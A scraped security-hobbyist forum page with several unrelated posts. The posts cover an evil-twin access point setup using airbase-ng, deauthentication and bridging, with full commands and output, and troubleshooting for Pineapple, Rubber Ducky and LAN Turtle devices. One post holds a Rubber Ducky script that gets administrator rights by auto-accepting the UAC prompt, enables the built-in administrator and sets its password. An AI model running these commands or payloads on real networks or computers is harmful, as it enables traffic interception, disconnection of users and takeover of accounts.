Search the Community

I have been working around the Evil Twin Airbase-ng for quite a while and i am unable to get my victim PC which is my other windows 10 machine to connect; It did connect to the AP once(rarely) and when it did it had no internet connect which has kept me up for sometime, i am going to post the proccess i have performed please go through them and guide me through the issue. Note:i have tried iptables and echo 1 it didnt help Setting up USB Adapter TP-LINK TL-WN722N Version 1 to monitor mode airmon-ng start wlan0 Checking for background proccesses that can interfere with the work airmon-ng check wlan0mon(assigned new name) Setting up the Fake AP airbase-ng -a 72:02:71:73:0D:B6 --essid Ryan -c 1 wlan0mon 17:19:25 Created tap interface at0 17:19:25 Trying to set MTU on at0 to 1500 17:19:25 Trying to set MTU on wlan0mon to 1800 17:19:25 Access Point with BSSID 72:02:71:73:0D:B6 started. 17:19:40 Client D0:13:FD:07:79:07 associated (WPA2;CCMP) to ESSID: "Ryan" 17:19:41 Client 20:16:D8:F4:0D:98 associated (WPA2;CCMP) to ESSID: "Ryan" 17:19:57 Client 20:16:D8:F4:0D:98 associated (unencrypted) to ESSID: "Ryan" 17:20:03 Client 20:16:D8:F4:0D:98 associated (unencrypted) to ESSID: "Ryan" Deauthorizing clients on another terminal aireplay-ng -0 0 -a 72:02:71:73:0D:B6 wlan0mon 17:22:11 Waiting for beacon frame (BSSID: 72:02:71:73:0D:B6) on channel 1 NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>). 17:22:11 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:11 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:12 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:12 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:13 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:13 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:14 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:14 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:15 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 Installing DHCP server apt-get install isc-dhcp-server Reading package lists... Done Building dependency tree Reading state information... Done isc-dhcp-server is already the newest version (4.3.5-3+b1). The following packages were automatically installed and are no longer required: casefile dconf-editor dconf-tools dissy gir1.2-nm-1.0 libbind9-140 libblas-common libcdio-cdda1 libcdio-paranoia1 libcdio13 libdns162 libemu2 libfwupd1 libgom-1.0-common libgtkspell3-3-0 libhttp-parser2.1 libisc160 libisccfg140 libllvm3.9 liblouis12 liblwgeom-2.3-0 libmozjs-24-0 libopencv-calib3d2.4v5 libopencv-core2.4v5 libopencv-features2d2.4v5 libopencv-flann2.4v5 libopencv-highgui2.4-deb0 libopencv-imgproc2.4v5 libopencv-objdetect2.4v5 libopencv-video2.4v5 libpython3.5 libpython3.5-minimal libpython3.5-stdlib libqcustomplot1.3 libqgis-core2.14.18 libqgis-gui2.14.18 libqgis-networkanalysis2.14.18 libqgispython2.14.18 libradare2-1.6 libtracker-control-1.0-0 libtracker-miner-1.0-0 libtracker-sparql-1.0-0 libva-drm1 libva-x11-1 libva1 maltegoce peepdf python-brotlipy python-pylibemu python-rsvg python-unicorn python3.5 python3.5-minimal tcpd Use 'apt autoremove' to remove them. 0 upgraded, 0 newly installed, 0 to remove and 30 not upgraded. Configuring nano /etc/dhcp/dhcpd.conf authoritative; subnet 192.168.1.0 netmask 255.255.255.0 { option broadcast-address 192.168.1.255; option routers 192.168.1.1; option domain-name-servers 8.8.8.8; range 192.168.1.10 192.168.1.200; default-lease-time 600; max-lease-time 7200; } Installing bridging utilities apt-get install bridge-utils Reading package lists... Done Building dependency tree Reading state information... Done bridge-utils is already the newest version (1.5-14). The following packages were automatically installed and are no longer required: casefile dconf-editor dconf-tools dissy gir1.2-nm-1.0 libbind9-140 libblas-common libcdio-cdda1 libcdio-paranoia1 libcdio13 libdns162 libemu2 libfwupd1 libgom-1.0-common libgtkspell3-3-0 libhttp-parser2.1 libisc160 libisccfg140 libllvm3.9 liblouis12 liblwgeom-2.3-0 libmozjs-24-0 libopencv-calib3d2.4v5 libopencv-core2.4v5 libopencv-features2d2.4v5 libopencv-flann2.4v5 libopencv-highgui2.4-deb0 libopencv-imgproc2.4v5 libopencv-objdetect2.4v5 libopencv-video2.4v5 libpython3.5 libpython3.5-minimal libpython3.5-stdlib libqcustomplot1.3 libqgis-core2.14.18 libqgis-gui2.14.18 libqgis-networkanalysis2.14.18 libqgispython2.14.18 libradare2-1.6 libtracker-control-1.0-0 libtracker-miner-1.0-0 libtracker-sparql-1.0-0 libva-drm1 libva-x11-1 libva1 maltegoce peepdf python-brotlipy python-pylibemu python-rsvg python-unicorn python3.5 python3.5-minimal tcpd Use 'apt autoremove' to remove them. 0 upgraded, 0 newly installed, 0 to remove and 30 not upgraded. Bridging interface root@kali:~# brctl addbr evil \\Name of the bridge i made root@kali:~# brctl addif evil eth0 \\my ethernet connection root@kali:~# brctl addif evil at0 root@kali:~# ifconfig at0 0.0.0.0 up root@kali:~# ifconfig evil up Starting DHCP server root@kali:~# systemctl start smbd.service root@kali:~# dhclient evil root@kali:~# service isc-dhcp-server restart root@kali:~# service isc-dhcp-server status ? isc-dhcp-server.service - LSB: DHCP server Loaded: loaded (/etc/init.d/isc-dhcp-server; generated; vendor preset: disabled) Active: active (running) since Wed 2017-12-06 17:32:35 EST; 6s ago Docs: man:systemd-sysv-generator(8) Process: 2049 ExecStart=/etc/init.d/isc-dhcp-server start (code=exited, status=0/SUCCESS) Tasks: 1 (limit: 4915) CGroup: /system.slice/isc-dhcp-server.service +-2061 /usr/sbin/dhcpd -4 -q -cf /etc/dhcp/dhcpd.conf eth0 Dec 06 17:32:33 kali systemd1: Starting LSB: DHCP server... Dec 06 17:32:33 kali isc-dhcp-server2049: Launching IPv4 server only. Dec 06 17:32:33 kali dhcpd2060: Wrote 11 leases to leases file. Dec 06 17:32:33 kali dhcpd2060: Multiple interfaces match the same subnet: eth0 evil Dec 06 17:32:33 kali dhcpd2060: Multiple interfaces match the same shared network: eth0 evil Dec 06 17:32:33 kali dhcpd2061: Server starting service. Dec 06 17:32:35 kali isc-dhcp-server2049: Starting ISC DHCPv4 server: dhcpd. Dec 06 17:32:35 kali systemd1: Started LSB: DHCP server. /etc/init.d/isc-dhcp-server start ok Starting isc-dhcp-server (via systemctl): isc-dhcp-server.service. IP gateway root@kali:~# route -n Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 0.0.0.0 192.168.1.1 0.0.0.0 UG 100 0 0 eth0 0.0.0.0 192.168.1.1 0.0.0.0 UG 600 0 0 wlan0 192.168.1.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 U 600 0 0 wlan0

I have a solid amber light on my mark 5 after installing the 2.4 bin file through the GUI on 192.168.1.1 after powering up while holding the button and continuing to hold for 10 earth seconds. really would like to get my pineapple running again.. -Jon

I have just received my USB rubber ducky and have attempted to access the microchip to put a inject.bin file. It is super frustrating and I am starting to regret my purchase. It just doesn't work and in device + printers, it says "Device Descriptor Request Fail". Please help me.

Hi all, I'm looking to make a script, in either batch or Powershell, that will give a user access to a folder and all folders leading down to it. So, it would; Ask for input of Active Directory UserID Ask for input of a folder path List all of the security groups for the first folder in the path and allow selection of which one the AD UserID will be added to. List all of the security groups for the second folder in the path and allow selection of which one the AD UserID will be added to. List all of the security groups for the third folder in the path and allow selection of which one the AD UserID will be added to. etc. So, if user JBLOGGS wanted access to folder '\\Here\There\Everywhere', the script would; List the security groups for the folder '\\Here' and prompt for which AD group to add user JBLOGGS to. List the security groups for the folder '\\Here\There' and prompt for which AD group to add user JBLOGGS to. List the security groups for the folder '\\Here\There\Everywhere' and prompt for which AD group to add user JBLOGGS to. Note - The security groups for a folder are normally viewable in Windows by right clicking in a folder and going to 'Properties > Security > Group or user names' Hopefully this makes sense, if not please let me know. Please note that I understand the script for adding a user to an AD group, that's easy. The struggle is getting a script to prompt which security group for each level of the folder path the user should be added to. Thank you in advance.

I just got my LAN turtle today and plugged it into my USB port. SSH (using putty) to it on 172.16.84.1, got the SSH key trust,typed root for the password and the default password from the Wiki page (http://lanturtle.com/wiki/#!index.md#Connecting_for_the_first_time) but given the error access denied. Any help would be appreciated. Something tells me that the Wiki page password might be out of date. Thanks, Mule

Hello everyone, I am new to the USB Rubber Ducky and today I made my first script. It is pretty simle, but it works. This script will open a powershell with administratior privleges after bypassing UAC, then it will activate the build-in administrator account and change the password to Password1. If anyone has any changes that would make this better, please share. REM Author securityoverride, with code based off of Hak5Darren REM Creation Date 5-26-15 REM This script will activate the default admin account and change the password REM ***Bypass UAC*** DELAY 2000 WINDOWS r DELAY 500 STRING powershell Start-process cmd.exe -Verb runAs ENTER DELAY 1000 ALT y DELAY 500 REM ***Activate the default admin account*** STRING net user administrator /active:yes ENTER DELAY 500 REM ***Change the default admin password to "Password1"*** STRING net user administrator Password1 ENTER DELAY 500 REM ***GTFO*** STRING exit ENTER

Ive got the Mark IV running 2.7 on windows 8. I have my pineapple tethered via Ethernet and sharing enabled.The problem im having is that when a device connects to an open network automatically, the pineapple receives the request and successfully associated according to the log page. with DNS spoof enabled it all looks good until the client tries to navigate the web. Two things have been happening. First is whenever the client tries to go to any site the load bar goes to about a third of the way and the page never loads regardless of whether it is a spoofed HTML site from the www folder or its just supposed to forward to the real site. Nothing works. Its like Karma is supposed to be a tool to disable internet access. But when the clients connect to the SSID broadcasted by the pineapple intentionally, ie selecting the network, everything works swimmingly as long as karma is disabled. clients have internet access and are either forwarded to their destination or the HTML page from the pineapple. The second thing thats happening is that occasionally when karma is enabled and a device connects to an open network from memory it will occasionally just switch over to the pineapple SSID. This may have something to do with the fact that the first network isnt providing internet access due to the fore mentioned problem. Let me know if you have any ideas. Thanks all.